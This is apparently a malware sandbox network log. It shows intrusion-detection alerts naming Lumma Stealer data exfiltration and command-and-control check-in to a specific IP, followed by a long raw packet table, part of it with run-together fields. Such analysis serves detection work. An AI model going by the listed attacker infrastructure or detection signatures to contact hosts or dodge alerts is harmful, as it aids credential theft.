2024-12-27T13:11:15.042052+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49713 | 172.67.216.236 | 443 | TCP
2024-12-27T13:11:15.889620+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.5 | 49713 | 172.67.216.236 | 443 | TCP
2024-12-27T13:11:17.342320+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49715 | 172.67.216.236 | 443 | TCP
2024-12-27T13:11:19.972669+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49725 | 172.67.216.236 | 443 | TCP
2024-12-27T13:11:22.467303+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49733 | 172.67.216.236 | 443 | TCP
2024-12-27T13:11:22.470686+0100 | 2843864 | ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 | 1 | 192.168.2.5 | 49733 | 172.67.216.236 | 443 | TCP
2024-12-27T13:11:27.031637+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49744 | 172.67.216.236 | 443 | TCP
2024-12-27T13:11:28.083267+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49744 | 172.67.216.236 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 27, 2024 13:10:58.451014996 CET | 49704 | 443 | 192.168.2.5 | 20.233.83.145
Dec 27, 2024 13:10:58.451077938 CET | 443 | 49704 | 20.233.83.145 | 192.168.2.5
Dec 27, 2024 13:10:58.451329947 CET | 49704 | 443 | 192.168.2.5 | 20.233.83.145
Dec 27, 2024 13:10:58.463287115 CET | 49704 | 443 | 192.168.2.5 | 20.233.83.145
Dec 27, 2024 13:10:58.463316917 CET | 443 | 49704 | 20.233.83.145 | 192.168.2.5
Dec 27, 2024 13:11:00.116440058 CET | 443 | 49704 | 20.233.83.145 | 192.168.2.5
Dec 27, 2024 13:11:00.116689920 CET | 49704 | 443 | 192.168.2.5 | 20.233.83.145
Dec 27, 2024 13:11:00.120071888 CET | 49704 | 443 | 192.168.2.5 | 20.233.83.145
Dec 27, 2024 13:11:00.120086908 CET | 443 | 49704 | 20.233.83.145 | 192.168.2.5
Dec 27, 2024 13:11:00.120331049 CET | 443 | 49704 | 20.233.83.145 | 192.168.2.5
Dec 27, 2024 13:11:00.159904003 CET | 49704 | 443 | 192.168.2.5 | 20.233.83.145
Dec 27, 2024 13:11:00.207344055 CET | 443 | 49704 | 20.233.83.145 | 192.168.2.5
                                                                                                        Dec 27, 2024 13:11:01.246042013 CET4434970420.233.83.145192.168.2.5
                                                                                                        Dec 27, 2024 13:11:01.246145964 CET4434970420.233.83.145192.168.2.5
                                                                                                        Dec 27, 2024 13:11:01.246210098 CET4434970420.233.83.145192.168.2.5
                                                                                                        Dec 27, 2024 13:11:01.246329069 CET49704443192.168.2.520.233.83.145
                                                                                                        Dec 27, 2024 13:11:01.246329069 CET49704443192.168.2.520.233.83.145
                                                                                                        Dec 27, 2024 13:11:01.251153946 CET49704443192.168.2.520.233.83.145
                                                                                                        Dec 27, 2024 13:11:01.397831917 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:01.397918940 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:01.398010969 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:01.398328066 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:01.398344040 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:02.611799955 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:02.611979961 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:02.614635944 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:02.614648104 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:02.614856005 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:02.616353989 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:02.659332037 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.091245890 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.091366053 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.091396093 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.091418982 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.091445923 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.091525078 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.091525078 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.091548920 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.091593981 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.108556032 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.112440109 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.112505913 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.112512112 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.120810032 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.120870113 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.120964050 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.120970011 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.121016979 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.210907936 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.263978958 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.283488035 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.287206888 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.287271976 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.287276030 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.287288904 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.287336111 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.294737101 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.302318096 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.302381992 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.302388906 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.309819937 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.309865952 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.309879065 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.317378044 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.317444086 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.317460060 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.357825041 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.357835054 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.371108055 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.371118069 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.371145010 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.371157885 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.371167898 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.371181011 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.371191025 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.371210098 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.371217966 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.371243000 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.420237064 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.492289066 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.492299080 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.492332935 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.492342949 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.492443085 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.492451906 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.492479086 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.492501020 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.519886971 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.519895077 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.519922018 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.519948006 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.519954920 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.519963026 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.519992113 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.520005941 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.546848059 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.546865940 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.546950102 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.546962976 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.547005892 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.581506014 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.581525087 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.581604958 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.581625938 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.581667900 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.681343079 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.681361914 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.681468964 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.681478977 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.681695938 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.700962067 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.700975895 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.701064110 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.701070070 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.701113939 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.717876911 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.717891932 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.717981100 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.717987061 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.718031883 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.734569073 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.734582901 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.734764099 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.734767914 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.734816074 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.749183893 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.749198914 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.749264956 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.749269962 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.749311924 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.764678955 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.764693975 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.764789104 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.764794111 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.764846087 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.864037991 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.864058971 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.864139080 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.864181042 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.864226103 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.874695063 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.874711037 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.874789000 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.874799013 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.874844074 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.886432886 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.886447906 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.886523962 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.886532068 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.886573076 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.897522926 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.897536993 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.897608995 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.897614002 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.897650957 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.909046888 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.909064054 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.909116983 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.909127951 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.909147024 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.909168005 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.918751955 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.918768883 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.918860912 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.918889999 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.918934107 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.929881096 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.929897070 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.929949999 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.929960012 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.930007935 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.955790997 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.955806971 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.955974102 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:03.955981970 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:03.956052065 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.055005074 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.055027008 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.055179119 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.055214882 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.055279016 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.063292980 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.063318014 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.063416958 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.063438892 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.063488007 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.070535898 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.070554018 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.070684910 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.070694923 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.070743084 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.078814030 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.078830957 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.078911066 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.078918934 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.078968048 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.087142944 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.087160110 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.087244034 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.087253094 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.087330103 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.094398022 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.094419956 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.094491005 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.094506979 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.094551086 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.102684975 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.102701902 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.102766037 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.102775097 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.102823019 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.146852970 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.146876097 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.147007942 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.147037029 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.147108078 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.246541023 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.246560097 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.246685982 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.246702909 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.246788979 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.254195929 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.254213095 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.254283905 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.254291058 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.254334927 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.261657953 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.261674881 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.261745930 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.261758089 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.261821985 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.269200087 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.269216061 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.269290924 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.269295931 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.269340038 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.275877953 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.275897026 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.276035070 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.276050091 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.276093960 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.283309937 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.283339977 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.283412933 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.283435106 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.283463001 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.283480883 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.290872097 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.290889978 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.291013002 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.291032076 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.291104078 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.338563919 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.338582039 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.338704109 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.338716030 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.338788986 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.440114975 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.440134048 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.440284014 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.440301895 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.440372944 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.447926044 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.447941065 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.448025942 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.448031902 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.448087931 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.454082966 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.454099894 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.454169035 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.454175949 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.454217911 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.461648941 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.461663008 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.461745977 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.461754084 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.461796999 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.468831062 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.468847036 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.468907118 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.468914986 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.468961954 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.475306988 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.475327969 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.475369930 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.475378036 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.475414038 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.475426912 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.482736111 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.482750893 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.482817888 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.482825041 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.482866049 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.531501055 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.531516075 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.531606913 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.531616926 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.531657934 CET49705443192.168.2.5185.199.108.133
                                                                                                        Dec 27, 2024 13:11:04.632318020 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.632339001 CET44349705185.199.108.133192.168.2.5
                                                                                                        Dec 27, 2024 13:11:04.632405996 CET49705443192.168.2.5185.199.108.133
